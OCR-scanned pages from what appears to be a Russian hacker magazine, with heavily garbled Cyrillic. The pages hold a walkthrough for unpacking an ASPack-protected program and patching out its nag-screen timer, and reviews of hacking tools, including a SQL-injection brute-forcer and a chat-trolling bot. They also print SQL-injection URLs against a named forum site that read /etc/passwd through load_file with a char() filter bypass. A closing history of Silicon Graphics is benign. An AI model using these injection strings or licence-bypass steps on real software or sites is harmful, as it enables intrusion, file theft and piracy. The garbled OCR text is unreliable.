программы (Огідіпаі Епігу Роіпі, или ОЕР). Я хочу 
сказать, что после распаковки кода программы и 
восстановления регистров происходит прыжок 
на начало кода, который приобрел работоспо- 
собность, где мы и должны прерваться (отом, 
зачем это нужно, речь пойдет ниже). 

Наша цель — найти соседствующие команды 
РОРАй и 9МР N и поставить точку останова на 
РОРАй. Поиск в ОНуйбд (<С1т1+Е>) команды 
РОРАй проходитуспешно, но вот незадача: она 
нигде не соседствуете ЛЧР N. Длятого чтобы 
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убедиться втом, что мы все делаем верно, вос- 
пользуемся утилитой РЕІсІ — хорошей помощ- 
ницей в определении типа пакера (протектора/ 
компилятораП ШрУ/реісІ.Ьаз.іІ: ). которую можно 
скачать на любом крякерском сайте. Запускай 
утилиту и скармливай ей ігезбиі.ехе. Она момен- 
тально выдаст нам результат: «АЗРаск 2.1 2^ 
Аіехеу Зоіобоѵпікоѵ». Значит, мы стобой сильно 
ошибались, ведь АзРаск действует немного 
иначе, чем совсем ужтривиальные пакеры. Он 
использует для перехода наОЕРнеЛЧРЫ.а 
конструкцию вида: 

РОРАБ; восстановление регистров 
БЫ2 асігезз 
МОѴ ЕАХ , 1 
КЕТБ ОС 

РІЛЗН 0 ; ОЕР кладется в стек 
К.ЕТЫ ; переход на ОЕР 

Нас интересуюттолько первая и две последние 
инструкции. Комментарии даютясное представ- 
ление о работе этого куска кода. Стоиттолько 
упомянуть, что команда РІІ5Н 0, послетого как 
мы прервемся на геі, положит в стек совсем не О, 
а значение ОЕР. Итак, ищем РОРАй с хвостом в 
виде вышеуказанного кода. Такой набор распо- 
лагается по адресу 005653АЕ: 

О 05 653 АЕ РОРАБ 
005653В0 БЫ2 5НОКТ 
ТгезЬиі . 005653ВА 
005653В2 МОѴ ЕАХ , 1 
005653В7 КЕТБ ОС 
0 05653 В А РБЗН 0 
005653ВЕ КЕТБ 



□ ОЕР найдена! 

По адресу 005653 В Е ставь точку останова, для 
этого выдели строку и нажми <Е2>. Все готово, 
запускай программу на исполнение (<Е9>). 
Выполнение еетутже и прервется, причем на 
вершине стека будет лежать адрес ОЕР, равный 
00507340 (заметил, как изменилась команда 
РІІ5Н 07), его мы запишем. Теперь переходим 
на начало кода программы, сделав один шаг 
(<Е8>). Мы попадем в место, очень похожее 
на кучухлама в видеданных, неправильно 
интерпретированных в качестве инструкций, но 
это далеко нетак. На самом деле, этот«массив» 
— ни что иное, как начальный код, стартующий 
с ОЕР! Если не веришь, нажми <СТРЕ+А>. 

После анализа ты увидишь характерное начало 
программы. 

На время сверни ОИуОЬд. Теперь, каки обещал, 
я скажу, зачем мы остановили программу на ОЕР. 
Для того чтобы получить более или менее рабо- 
тоспособную программусоснятымупаковщиком, 
нужно сделать дамп, онже моментальный снимок 
области памяти, где размещена наша программа, 
причем не когда-нибудь, а именно сразу после 
распаковки, когда программа прервется на ОЕР. 
Для этой цели под ой дет инструмент ЕогсІРЕза 
авторством Уоба (респект!). Запускай эту утилиту, 
выбирай в окне процессов нашу программу, 
висящую под отладчиком, и, нажав по ней правой 
кнопкой мыши, выбирай в меню«ВитріиІІ». Со- 
храни файл под именем битр.ехе. Полученный 
дамп будет неработоспособен, так кактаблица 
импорта не восстановлена. Привести битр.ехе 
в чувство по может утилита Ітрогі Ресопзігисіог. 
Запусти ее. Выбери вспискеАііасЬіоапасііѵе 
Ргосезз процесс ітезбиі.ехе и введи ОЕР в 



соответствующее поле программы. Причем ОЕР в 
этом случае будет равняться 00507340-ІтадеВазе 
=00507340-00400000=00107340 (ІтадеВазе - это 
адрес, с которого в памяти идет код программы, 
его нам указал отладчик). Теперьжми на кнопку 
«Сеі Ітрогі:». При этом не обращай внимания 
на издержки — мусор в виде нераспознанных 
функций, который будет отображен среди верно 
отысканных данных в виде двух последних 
ветвей: »?РТИипк:001 0Р8Е0 І\ІЬЕипс:3 ѵаіібто» 
и »?ЕТЬипк:0010Е8Е0 І\ІЬЕипс:3 ѵаііскпо». Ты 
можешьубедиться в ненужности этих«эле- 
ментовтаблицы импорта», если перейдешь по 
смещениям 0050Е8Е0 и 0050Е8Е0 и взглянешь на 
содержимое памяти. Первый фантомный ЕіЬипк 
— строка «кегпе132.сІ II», то есть имя библиотеки, 
импорт функций из которой распознан, а второй 
«непрошеный гость» — часть имени функции, 
которая размещена в Ітрогі ТаЫе первой 
(ВеІеіеСгііісаІЗесііоп). Мусор нужно отрезать, 



Полезный _ 
крякерскии ресурс 

Все инструменты, упомянутые в статье, мож- 
но найти на лучшем крякерском ресурсе 
ѵѵѵѵѵѵ.сгаскІаЬ.ги . Помимо этого, сайт располагает 
внушительной коллекцией статей по крякингу и 
набором различных полезных ссылок. Конечно 
же, нельзя неупомянутьо форуме. Он является 
главной достопримечательностью ресурса, и сле- 
дует признать, что все имеющееся на сайте — это 
лишь приятное дополнение к наи полезнейшему 
форуму, где можно повстречать незаурядно та- 
лантливыхлюдей, относящихся кэлите крякинга. 
Среди них — [НЕХ], МогдС, бгадоп (с) и другие. Я 
выражаю им почтение. Спасибо, Ваб_диу! 
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> На нашем ОѴОты 
найдешь все про- 
граммы, упомянутые 
в этой статье. 




>Эта статья — плод 
воображения автора, 
Все совпадения с 
реальным взломом 
— случайность :). 
Помни: за наруше- 
ниетобой закона ни 
автор, ни редакция 
ответственности не 
несут! 




>Никакихнагов! 



выделив его целиком и выбрав в меню правой кнопки мыши 
«ОеІеІеТЬипкз». Таблица импорта воссоздана, осталось ис- 
править файл дампа. Для этого нажми на кнопку «Ріх Оілтір» и 
укажи программефайл бштр.ехе. Вдиректории с программой 
будетсоздан файл битр_.ехе, который и следует за пустить. 

Он работает, а это значит, что мы распаковали исполняемый 
файл.Теперьнужнолишьнабратьсятерпения и, отыскав 
сообщение о необходимости получения регистрационного 
ключа, удалить его. 

□ Взлом 

Переходим косновной части нашего тривиального взлома. 
Загрузи битр_.ехе под ОНуйбд. Теперь в коде можно легко 
отыскивать нужные места и патчить их какзаблагорас- 
судится, ведь АзРаскуже снят. Поговорим о выдаваемом 
сообщении. Запуская наштвикер, мы видим, что кнопка 
«ОК» на диалоговом окне-наге недоступна для нажатия 
до тех пор, пока не пройдетопределенное количество 
времени. Это означает, что здесь не обошлось без таймера. 
Последний обычноустанавливается функцией ЗеіТігшег. 
Попробуем установить на нее точку останова. Жми <АІТ+Р1 > 
(если утебя стоит плагин СоттапбВаг) и вводи команду Ьрх 
ЗеіТітег. Запускай программу на исполнение (<Р9>). Мытут 
же прервемся по адресу 00435576 где и находится нужная 
нам функция. Теперь необходимо проанализировать, что же 
происходит послетого, как«время пошло». После установки 
таймера программа выдает окошко (ЗИоѵѵѴѴІпбоѵѵ), поэтому 
нужно немного протрассировать программу (<Р8>) — до 
места, где эта процедура вызывается (это происходит по 
адресу 0048221 Е). Пологике, проверка того, не закончилось 
ли время, отведенное таймером, является циклом. Поэтому 
трассируем и дальше, пока не наткнемся на цикл по адресу 
00482838 (на то, что это то, что мы искали, указывает и функ- 
ция ЗепбМеззаде, расположенная чуть выше). Я расскажу, 




> Восстановление импорта в ІтрВес 



какдеактивироватьего. Переходом на начало цикла управ- 
ляет инструкция: 

0048287Е ЦЕ ЗНОЕТ сІшпр_. 00482 83 8 

Нам нужно всего лишьудалить этот переход! Дляэтого 
выдели его, нажми пробел и введи в появившемся окне 
«пор» (это инструкция «холостого хода», она ничего не 
выполняет), установи флажок «Рі II ѵѵіОп ЫОР’з» и дави «ОК». 
Теперь нажимай <Р9>. Все получилось! Осталось лишь 
сохранить сделанные изменения: выдели пор’ы, которыми 
мы заменили переход, располагавшийся по адресу 0048287Е, 
нажми на правую кнопку мыши и выбери «СоруЬ ехесиіаЫе 
-> Зеіесбоп». Далее в появившемся окне в меню выбери 
«Заѵе Рііе» и сохрани файл под любым именем (к примеру, 
битр_2.ехе). Запускай этот файл и наслаждайся результатом !□□ 
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В этом месяце Х-конкурс берет небольшой перерыв 



чтобы возобновить свою работу в новом формате. В 
середине июня откроется сайт сопіезі. хакер. ги с пос- 
тоянно действующим хак-квестом р участвовать в ко- 
тором ты сможешь в любое время, а не раз в месяц. Мы 
сделаем рейтинговую систему участников, и самые 
активные и успешные будут получать ценные призы от 
наших партнеров. 

Если ты хочешь помочь нам словом или делом и у тебя 
есть какие-то идеи и пожелания, присылай их нам на 
сопІезІГСгеаІ. хакер, ги. 
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ПРОГРАММЫ ДЛЯ ХАКЕРОВ 



^ ПРОГРАММА: АІЧТІСНАТ 8ЦІ_-Т00І_8 
ОС: ѴІІЧ&0ѴЗ/ *ІЧІХ 
АВТОР: ЕІ.ЕКТ 




Читая изо дня в деньбагтрак, ято и дело на- 
талкиваюсь на вді-инъекции в различных веб- 
приложениях. И это понятно, ведь чем больше 
движков пишут, тем больше их и ломают=). В 
своих статьях я не раз затрагивал тему проведе- 
ния инъекций самых разныхуровней слож- 
ности. Но основная проблема как была, так и 
остается: автоматизация процесса взлома. Если 
ты сталкивался с геморройными ситуациями, 
когда не получается подобрать количество по- 
лей или неудается определить именатаблиц, то 
ты меня поймешь. Зачастую меня не прикалы- 
вает вручную составлять нужный запрос кбазе, 
тратя на это несколько часов в надежде выудить 
заветные данные. Таким образом, идея написа- 
ния функционального зді-брутера не нова. Мне 
попадалось несколько вариантов реализации 
подобного рода софтин, но все они, так или 
иначе, имели существенные недостатки. Но не 
такдавно один из моихзнакомых поделился 
со мной тулзой АпбсЬа* ЗСИ-^ооІз, предназна- 
ченной для посимвольного брута данных. Надо 
сказать, что эта утила покорила меня за считан- 
ные минуты. Во-первых, она написана на перле, 
во-вторых, имеетбІЛ-интерфейс, в-третьих, 
работает как под виндой, так и под никсами, а 
в-четвертых, отлично справляется со своими 
задачами. О последнем пункте поговорим более 



подробно. После запуска скрипта твоему взору 
предстанет несколько полей: 

Ра*Мозі*е — путь ксайту суязвимым скриптом. 
Розіііѵе Апзѵѵег — подзапрос к БД. Напри- 
мер, «ѵегзіоп О» или «(зеіесі изег^гот 
тузці.изег]». 

ЗиЬзІгіпд — строка, присутствующая в ответе, 
если выполняется условие 1 =1 , и отсутству- 
ющая, когда 1 =2; при указании «АІІТО» будет 
определена самостоятельно. 

СЬагзе* — наборы символов азсіі: 0 — все, 

1 — ГШСІ5, 2 — цифры, 3 — буквы английского 
алфавита, 4 — буквы русского алфавита. 
І_епд*Ь — автоопределение длины строки. 
Удобно при б руте строк рандомных дл ин. 

0 — выход при первой ошибке; 

1 — задаем нужную длину строки через п и І\І; 

2 — включаем автоопределение длины стро- 
ки; все ненайденные азсіі обозначатся «*». 
Міп І_епд*б — (только для І_=1) позиция перво- 
го символа в строке, с которого начнем брут. 
Мах І_епдіЬ — (только для І_=1 ) позиция 
последнего символа в строке, на котором 
закончим брут. 

Зрасе — вид пробела: « % 2 0 » , «+», «%2 В», 
«/**/», « % 0 9 » , « % О Б » , « $ I Р 5 » . 

Соттепі — вид комментариев: «/*», «--», 

«#» (в зависимости от БД, установленной на 
атакуемом сервере). 

Кроме того, есть выбор между ѲЕТ- и 
РОЗТ-запросами и возможность установки 
тайм-аута между обращениями кбазе. Еще 
одна интересная фича — случайный выбор 
юзер-агента из файла изегадепКМ. А в 
файлик ргоху.М не забудь положить свежий 
прокси -л ист :). Лог о проделанной работе 
тулза сохраняет в файл 1од_осЬ.Ш, так что 
случайная потеря данных не страшна. Одним 
словом, тизі Ьаѵе, причем в обязательном 
порядке =). 

Л ПРОГРАММА: БОТ ДЛЯ СНАТ.МАІІ_.Ри 
ОС: УІІЧ0ОУ5/ *МІХ 

АВТОР: ВІТ-ТЕАМ (V УУ ВІТ-ТЕАМ.СОМ) 
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> Запускаем бота для сГіаІ.таіІ.ги 

Как известно, чат — прежде всего отличное 
пространство для всевозможных приколов 
и общения. Но просто разводить девчонок 
со временем становится скучно, и в голову 
начинают лезть самые разнообразные идеи. 
Помнится, в одно время были очень попу- 
лярны чат-боты, над которыми не стебались 
только самые ленивые. Однако большинство 
ботов было достаточно примитивным и имело 
мало возможностей. Но сегодня мы частично 
исправим ситуацию =). Нет, не подумай, я не 
буду заставлять тебя кодить своего бота :). 

За тебя это уже сделали ребята из ВІТ-ТЕАМ, 
которые создали вполне функциональное 
существо для чата на таіі.ги . Бот написан на 
рбр, поэтому в архиве ты найдешь несколько 
рбр-скриптов, индексовую страничку, мануал 
и чуток словариков. Запуск продукта осущест- 
вляется из іпбех.ЫтІ после того, как ты за- 
льешь содержимое архива на сервер. Для кор- 
ректной работы бота в файле Ьо1;_іпсІех2.рЬр 
необходимо прописать доверенные етаіі- 
адреса, с которых будет возможно управление 
ботом. Там же нужно указать мыльник, под 
которым будет логиниться сам ботинок. Сразу 
отмечу, что бот обладает множеством команд, 
поэтомуя опишутолько наиболее важные/ин- 
тересные. Итак, поехали: 
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• ! банлист+ [е-шаіі] * — внесение непон- 
ра вившегося мыла в ба нл ист — ЫаскІізЕгЬЕ 

• !хуиз [ІР-адрес] * — получение данных 
об ІР-адресе через хѵиз-сервис ѵѵЬоіз.гіре.пеЕ 

• !пой [название файла] * — построчное 
цитирование указанного файла с задержкой 
между строчками в три секунды. Для этого 
цитируемый файл должен быть сохранен в 
папке основного скрипта с названием назва- 
ние_файла.гЫ (файлы конь.гЫ, елка.гЫ). 

• !кик [ник] * — выброс пользователя сука- 
занным ником из чата (душевная команда =)). 

• !комендантч+ *— этой командой включа- 
ется режим «комендантский час», при котором 
бот выгоняет всех вновь вошедших чатлан. 

Она бывает полезна для проведения приват- 
ных бесед и при атаках флудеров. 

• !диалог+ * — включаем бота в активную 
беседу, бот будет отвечать на адресованные 
ему высказывания (файл Ьгеб.гЫ:). 

• ! свали * — выкидываем бота из чата. 

Это далеко не полный перечень команд, поэтому 
можешь смел о экспериментировать. Кстати, 
тебе повезло — надискя выложил именно 
приватную версию бота, а не ту, что доступ- 
на для всех желающих на сайте команды (за 
появление бота на свет благодарим хакера 
под ником 5МЕР5Н). Вобщем, приятного 
тебе отдыха и веселого глумления над 
народом :). 

А ПРОГРАММА: ІЧОТЕРА0 2 
ОС: УІІЧ0ОУ8 98/МЕ/20О0/ХР 
АВТОР: ЕЮКІАІЧ ВАІ.МЕК 




> Главная тулза хакера 

Взглянув в графу названия программы, ты, 
наверное, удивился (или подумал, что втвоем 
любимом журнале курят не ту траву =)). Спешу 
объясниться. Утила, которую я тебе сейчас 
представлю, действительно носит гордое 
название КІоіерасІ 2 :). Дело втом, что меня уже 
порядком достали тулзы для подсветки синтак- 
сиса различных языков программирования. 
Под Ыпихтакой проблемы нет, поскольку под 
рукой всегда есть ѵіт и кѵѵгііе, а вот под Виндой 
я перебрал с десяток подобных прог. Однако 



ни одна из них не смогла удовлетворить моих 
вполне скромных потребностей. Ксчастью, в 
один прекрасный моментна глаза мне попался 
очередной заменитель блокнота — ЫоіерасІ2. 
Поюзавтулзу несколько дней, я навсегда 
уготовил ей место на своем винте =). Перечислю 
основные характеристики софтинки: 

• настраиваемая подсветка синтаксиса: 
НТМЦ ^ѵаЭсгірі, ѴВЗсгірД А5Р, РНР, С55, 
РегІ/СѲ I ; 

С/С++, С#, Заѵа, ѴВ, Разсаі, Аз5етЬ[ег, 501; 
ІЫІ, РЕ6, I N Р, ВАТ, ОІЕЕ; 

• редактирование текста перетаскиванием; 

• простые регулярные выражения поиска и 
замены; 

• команды редактирования слова, строки и 
блока; 

• подсветка скобок, автоотступ, указатель 
длинных строк, увеличение; 

• поддержка текстовых файлов ІІпісосІе, ІІТР- 
8, ІІпіх и Мае; 

• вставка времени/даты (краткая/полная 
форма) (<СМ+Е5>, <Сіг[+5ЬІЙ+Е5>); 

• вставка имени файла/пути (<Сіг[+Е9>, 
<СШ+5ЫЙ+Е9>). 

Кроме того, доработанный блокнотик имеет 
огромное количество горячих клавиш, вот 
лишь самые полезные из них: 

<Р1 2> — указать схему подсветки синтаксиса; 
<С*гІ+Р1 2> — настроить схему подсветки 
синтаксиса; 

<С*гІ+5ЫК+ІМ> — показать нумерацию строк; 
<С*гІ+6> — переход на указанную строку; 
<С*гІ+В> — найти соответствующую скобку; 
<С*гІ+5ЫН+В> — выделить до скобки. 

Нетсмысла продолжать описывать все, на что спо- 
собен ЫоіерасІ 2. Главная черта программ такого 
рода — это удобство. Поэтому смело сливай с на- 
шего ОѴй апдейтнутый блокнот — не пожалеешь. 

ПРОГРАММА: ІІЧ0ЕСТОК 
ОС: ѴІІЧ0ОѴЗ 98/МЕ/2000/ХР 
АВТОР: ЗМЕР5Н 




Возвращаемся кнаболевшему, а именно кавтома- 
тизации взлома. Рассказывая в первой части ста- 



тьи о проге АпбсЬаіЗСИ-'ІооІ.з, я не спроста затро- 
нул этутему. Не спорю, утила полезная и классная, 
но не об этом речь. Еслиты внимательно читал мои 
предыдущие статьи, то заметил, что при взломе 
БД, реализуя очередной мудреный инъект, то и 
дело приходится юзать функции сЬаг(), сопсаШ, 
ит.д. И всебыхорошо, но вбивать вручную та кие 
строки — занятие для редкого мазохиста =). 

Вот прикинь, имеем мы на рукахтакую багу: 

ЫсДр : / /зсгірЦ . ДошгсІеЬаІі . сот/ 
азпбогит/ѵіетлЩоріс . р]зр?ісІ=-11+ип 
іоп+зе1есД+1 ,2,3, 4, 5,6, 7+/* 

Первым делом, подобрав количество полей, 
проверяем наличие прав біІе_ргіѵ: 

ЫсДр : / /зсгірЦ . РоигсІеЬаІі . 
сош/азпбогиш/ѵіе^Роріс . р1ір?ісІ=- 
ІІ+ипіоп+зеІесД + 1 , 2 , 3 , 4 , 5 , 1оас1_ 
Іііе ( ' /еРс/раззмс! ' ) ) ,7 + /* 

И тут скрипт выдает ошибку, не суля ничего, 
кроме облома :(. Что делать? Правильно, попро- 
бовать обойти фильтрацию при помощи сбаг(): 

ЪРДр : //зсгірр . РоигсІеЬаІі . сот/ 
азпІогит/ѵіеілЩоріс .р]гр?іс1=-11+ип 
іоп+зеІесД+1 , 2 , 3 , 4 , 5 , 1оасі_бі1е (с 
Ъаг (47,101 ,116,99,47 ,112 ,97 ,115, 
115,119,100) ) ,7+/* 

В результате получаем доступ к чтению файлов на 
сервере =). Кчемуяэто говорю? Да ктому, что пере- 
водить вручную строку «Мс/ра5Б\л/б»в«47,1 01 ,1 1 6,99,4 
7,1 12,97,1 15,1 1 5,1 1 9,100» — занятие не из приятных. 
А теперь представь, какое «удовольствие»™ полу- 
чишь, переводя ручками путьдо конфига«/Ьоте/ 

ІсІ Ь/ри Ыіс_Ы;тІ/5Сгі рѴазпЬги т/сопіід . рбр» =) . 

Я уже молчу про случаи, когда выводится содер- 
жимое только одного поля и нужно юзать сопсаШ. 
Геморроя хватает везде, а в нашем деле — тем 
более :). В одном из прошлых номеровжурнала я 
выкладывал свой перловый скрипт, возможнос- 
тью которого была, в частности, работа с А5СІІ. Но 
недавно, мне подвернулась гораздо болееудобная 
тулза, имя которой ІщесЬВ. Распинаться сильно не 
буду, коротко обозначу основные моменты: 

• работа с сЬаг(), сопсаД), поі іп(); 

• презентабельный интерфейс :); 

• удобно висит в трее =). 

Честно говоря, софтинка до боли простая, но 
ее реализация заслуживает респекта. Туевый 
интерфейс выполнен на пять с плюсом, да и в 
трее тулза смотрится прекрасно. Удобно, когда 
под рукой всегда есть нужный тебе инструмент, 
который, ко всему прочему, еще и радует глаз. НС 
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МАРИЯ «МІРВІІ_І_» НЕФЕДОВА 

/ МІГШШЗШООІСК.В1І / 




компьютерной 

графики 

ИСТОРИЯ 5ІЫС0Ы 6РАРНІС5, ІЫС. 




Сегодня речь пойдет о всемирно известной Зііісоп СгарЫсз, Іпс. (ЗОІ) . После 25 лет на 
рынке компания потеряла все свои преимущества и практически осталась не у дел. 

Что же послужило причиной банкротства 5СІ, некогда выпускавшей одни из самых мощ- 
ных рабочих станций в мире, разрабатывавшей суперкомпьютеры для ЫА5А и создавав- 
шей спецэффекты для самых известных блокбастеров Голливуда? 



□ Возникновение и громкий успех 

В далеком 1982 году профессор Стэнфордского университета Джеймс 
Кларк решил оста вить должность преподавателя электромеханики ради 
основания собственной компании. Идея ее создания сформироваласьу 
Кларка еще несколько лет назад. Вто время он вместе с Марком Ханной 
занимался схемой для обработки трехмерной графики. Когда творение 
было готово и запатентовано под именем беотеігу Епдіпе, начались долгие 
поиски инвесторов. Кларкобращался даже ктаким гигантам компьютерной 
индустрии, какІВМ и Неѵѵіей-Раскагсі, но его разработки их незаинтере- 
совали. Профессор понял, что если он хочет воплотить свои идеи в жизнь и 
заставить их работать, то пора всерьез задуматься о собственной компании. 
По счастливому стечению обстоятельств, в 1981 году на выставке-конфе- 
ренции 5 ІѲ6РАРН к проекту беотеіту Епдіпе на конец удал ось привлечь 
внимание спонсоров. Компания Маубеісі Ѳгоир была готова вложить 
в разработки Кларка 20 миллионов долларов. Это стало решающим 
фактором, и он вместе с Эбби Сильверстоуном, Марком Ханной и группой 
выпускников Стэнфорда основал компанию Эііісоп СгарЫсз. 

Первым проектом молодой компании стала серия ІРІ5 1000 — высокопро- 
изводительных машин, получивших та кое название благодаря интег- 
рированной в них системе растрового изображения (ІпіедгаіесІ Разбег 
Ітадіпд Эузіет). ІРІЭ'ы функционировали на Ѳеотеігу Епдіпе и обраба- 
тывали данные с фантастической для тех лет скоростью. Комплектация, и 
правда, выглядела внушительно: процессор Моіогоіа 68000, 

2 мегабайта оперативной памяти, материнская плата, разработанная для 
рабочей станции 5ип-1 , собственная операционная система I Р IX, создан- 
ная 561 специально для своих машин. Стоит отметить, что удовольствие 
было не из дешевых — цена на I Р 15 1 000 зависела от комплектации и 



колебалась в районе $80000. 1 Р 15 1 000 проектировались как графические 
терминалы, способные работать только при подключении к ЭВМ серии 
ѴАХот компании йЕС. 

Но ситуация измениласьс выходом в светмодели ІРІ53000 — I РІ5 предста- 
ли перед публикой как самостоятельные компьютеры. Следующим шагом 
стал выпуск моделей ІРІ53130. Они уже послужили прототипом полноцен- 
ной рабочей станции от 561. Они функционировали на II N IX (06 ІРІХ бази- 
руется на ІІКІІХѴ), использовали процессор Моіогоіа 68020 и сопроцессор 
ѴѴеііек, а также комплектовались двумя жесткими дисками по 300 Мб каж- 
дый, что по тем временам было очень много. 3130 были достаточно мощны, 
чтобы заниматься обработкой Зй-анимации без поддержки извне. 

Уже в 1987 году 561 выпустила свою первую полноценную графическую 
станцию — ІРІ540, поистине ставшую курицей, несущей золотые яйца. В 
линейке ІРІ54й компания переключилась на процессоры РІ56, исполь- 
зующие МІР6 — архитектуру, разработанную группой ученых все изтого 
же бтэнфорда. бамая мощная модель серии ІРІ540 комплектовалась 
процессором 33 МГц и 256 Мб оперативной памяти и была способна обсчи- 
тывать до 100000 полигонов в секунду. Рабочая станция была прекрасна во 
всем, бдното, что даже корпуса изготавливались на специальной фабрике 
пластмассы, принадлежащей 561, говорито многом. Модельбыстро вошла 
в обиход в соответствующих кругах. На выставках 5І66РАРН демонстриро- 
валисьдесятки новых программ, разработанныхспециально под ІРІ540. 
Ав 1988 годубыл дан пресс-релиз о грядущем выходе подсерии ІРІ540 
— ІРІ5 40 Роѵѵег, серверной графической станции с двумя, четырьмя или 
восьмью процессорами. И в конце года компания обнародовала финансо- 
вые итоги, показавшие прибыльв 167 миллионов долларов. 

Дела у 561 и такобстояли прекрасно, когда они вышли на следующий 
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виток развития. В 1989 году в прокат вышел фильм «Бездна». Для со- 
здания спецэффектов в картине использовались станции ІРІ54Б/706и, 
программный пакет Аііав 2.4.2. «Бездна» открыла для 561 двери в Голли- 
вуд и впоследствии сделала слова «Зііісоп бгарЫсв» и «спецэффекты» 

— синонимами. 

□ «ІКІ5 Іпсіідо» 

В 1 990 году публике представили ІРІ5 Іпсіідо — наверное, самое популярное 
детище 561 — эти компьютеры пользуются спросом по сей день, бамая серь- 
езная конфигурация Іпсіідо комплектовалась процессором 1 00 М Гц, 384 Мб 
63У и Еіэп — графической системой из четырех беотеігу Епдіпе. Такая кон- 
фигурация способна была обсчитывать уже до370тысяч полигонов в секунду, 
бкрыленные громким успехом и баснословными прибылями, разработчи- 
ки 561 в 1992 году объявили о создании суперкомпьютера под названием 
Реаіііу Епдіпе. Ему действительно не было аналогов: восемь процессоров 
ІР5 Р3000, 256 Мб оперативной памяти, еще восемь графических про- 
цессоров І860 ХР. Производительность этой системы была 
1,1 миллиона полигонов в секунду, что само по себе было прорывом. 
Вскоре после РеаЫу Епдіпе светувидела система следующего поколения 

— бпух Реаіііу Епдіпе, выдававшая уже 2 миллиона полигонов. И вплоть 
до ее появления 561 использовала в своих машинах для работы с графи- 
ческими подсистемами систему Ігівб Б (ІРІ5 бгарЫсв Бапдиаде). Но чем 
мощнее становились разработки 561, тем сложнее было адаптировать 

под них I гізб I 5іІісоп бгарЫсв приняла решение о переделке ІгівбБ. Так 

на свет появился 6реп6І_, который продавали всем желающим получить 
лицензию компаниям. Но основной смысл заключался не в этом — в 561 
был создан специальный отдел, пристально следивший за всеми моди- 
фикациями их АРІ и новыми разработками на ее основе. 

Втом же 1 992 году компания начала играть по-крупному и купила МІР5 
ботріЛегбувіетв Іпсза 400 миллионов долларов. МІР5 являлась основ- 
ным поставщиком процессоров для 561, но помимоэтого, компания выпус- 
кала и собственные рабочие станции. После перехода под крыло 5ІІісоп 
бгарЫсв, МІР5 перепрофилировали и ориентировали исключительно на 
разработку и выпуск процессоров для нужд 561, отметя все остальное как 
ненужное. В результате этой сделки в зависимость от56І попали такие 
крупные компании, какАТ&Т, N Е6, 5іетепг и 5опу Місгозузіетв.таккак 
МІР5 являласьосновным поставщиком процессоров и для них. 

1992 год закончился для 561 убытками в районе 1 18 миллионов, бднако 
руководство компании смотрело в будущее с оптимизмом, собираясь 
направить разработки МІР5 в нужное ему русло и продолжить развитие, 
бледующий год принес множество заказов, буперкомпьютеры 561 исполь- 
зовались повсеместно при серьезной работе с графикой, в крупных иссле- 
довательских центрах и в прочих подобныхусловиях. Но останавливаться 
на разработке таких дорогих систем (речь шла о миллионах долларов) 561 
не стала, выпустив рабочую станцию Іпсіідо 2, базирующуюся на новых 
процессорах МІР5. бднако Іпсіідо 2 никакнельзя было назвать дешевым 
решением, цена все равно оставалась очень высокой, и о массовых прода- 
жах речи не шло. Атем временем на рынке начали появляться конкурирующие 
компании: 5РАРСзІайоп,5ип Місговувіеппв, Арріе, предлагающие сходные 



по производительности системы по более умеренным ценам, бтветом на 
это стала станция Іпбу ценой всего в 5000 долларов, укомплектованная 
процессором 100 МІР5 Р5000, особенности которого позволили отказать- 
ся от видеокарты вообще. Также, стремясь заинтересовать покупателя, 
Іпбу оснастили тремя видеовыходами и завершили всеэто великолепие 
видеокамерой Іпбубат, которая входила в комплект. 

В этом же году было заключено два выгодных контракта. Первый — со 
студией Джорджа Лукаса, позволивший 561 использовать его студию как 
полигон для испытаний, а к услугам Лукаса, в свою очередь, предоставля- 
лись все новинки и разработки 561. Второе соглашение было достигнуто 
с Тіте ѴѴагпег — 561 подписалась оказывать всяческую поддержку в 
нелегком деле развития интерактивного телевидения. 

На тот моментбііісоп бгарЫсвбыла настоящим эталоном иживым 
олицетворением технического прогресса. Дошло до того, что тогдашний 
вице-президент 6Ш А Альберт Гор нанес широко освещавшийся прессой 
визит в 561, для «ознакомления с разработками компании». 

□ Черная полоса 

561 быстро развивалась, продолжала укрепляться на рынке, а имя компа- 
нии уже почти стало нарицательным, нотут, как гром среди ясного неба, 
пришло известие об уходе из 5іІісоп бгарЫсв отца-основателя компании 
Джеймса Кларка, бфициальное заявление гласило, что Кларкрешил 
заняться новыми развивающимисятехнологиями: широкополосными 
сетями и интерактивным телевидением, бднако было ясно, что настоя- 
щая причина кроется не в этом. 

К тому времени компания превратилась в огромный концерн, насчитыва- 
ющий более 12000 сотрудников, и уверенно держалась ранее заданного 
курса. 561 продолжала проектировать суперкомпьютеры, дорогостоя- 
щие рабочие станции и совершенно забыла о рынке более доступной и 
дешевой электроники. Атехнический прогресс, как известно, не стоит на 
месте. К 1994 году уже стало ясно, что обычные домашние компьютеры в 
скором будущем догонят по производительности рабочие станции 5ІІісоп 
бгарЫсв, притом что стоить они будут в десятки и сотни раз дешевле, 
бднако руководство компании не желало признавать этот факт, равно как 
и то, что и их сегмент рынка — сверхмощные вычислительные машины 
— тоже становится все более «людным». 561 теряла свое главное пре- 
имущество — поприще, ранее принадлежавшее только ей, завоевывали 
молодые и перспективные компании. 

Кларк понял, к чему все идет, и попытался призвать советдиректоров 
компании к здравому смыслу. 6н утверждал, что нужно уделить более при- 
стальное внимание потребительскому рынку: домашним компьютерам, 
игровым приставкам, мультимедийным системам. Но его не послушали. 
Политика 5Шсоп бгарЫсв с самого основания постановляла, что если у 
кого-то имеются иные взгляды на развитие компании, то это его пробле- 
мы и ему не по пути с 561. Так вышло, что «не по пути» оказалось и самому 
основателю компании. 

бета вив 5ІІІСОП бгарЫсв, доктор Кларк присоединился к своему 
старому другу — Марку Андерсену, который занимался разра- 
боткой нового графического браузера. Чуть позже они вместе 
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основали компанию Мозаісботтипісаііопз, впоследствии пре- 
вратившуюся в Ыеізсаре боттипісаііопз. 

В 561 проблемы начались практически сразу послеухода Кларка. Сна- 
чала всемирно известная анимационная студия Ріха г решила заняться 
производством первого в истории мультфильма, полностью выполнен- 
ного при помощи компьютерной анимации. Мультик получил название 
«Игрушечная история». И для своих нужд Ріхаг использовалатехнику 
конкурирующей компании 5ип Місгозузіетз, а машины 561 играли роль 
лишь вспомогательного инструмента. Следующий удар по престижу 561 
нанесла компания Місгозой. Дело в том, что когда 561 приняла решение 
пустить 6реп6І_ в открытое плавание, Місгозой заключила с ней контракт, 
согласно которому5ІІІсоп бгарЫсз должна принять участие в разработ- 
ке новой версии брепбЦ предназначенной специально для ее новой 
операционки — ѴѴІпсІоѵѵз ЫТ. Так и случилось, ѴѴІпсІоѵѵз ЫТ вышла в свет, и 
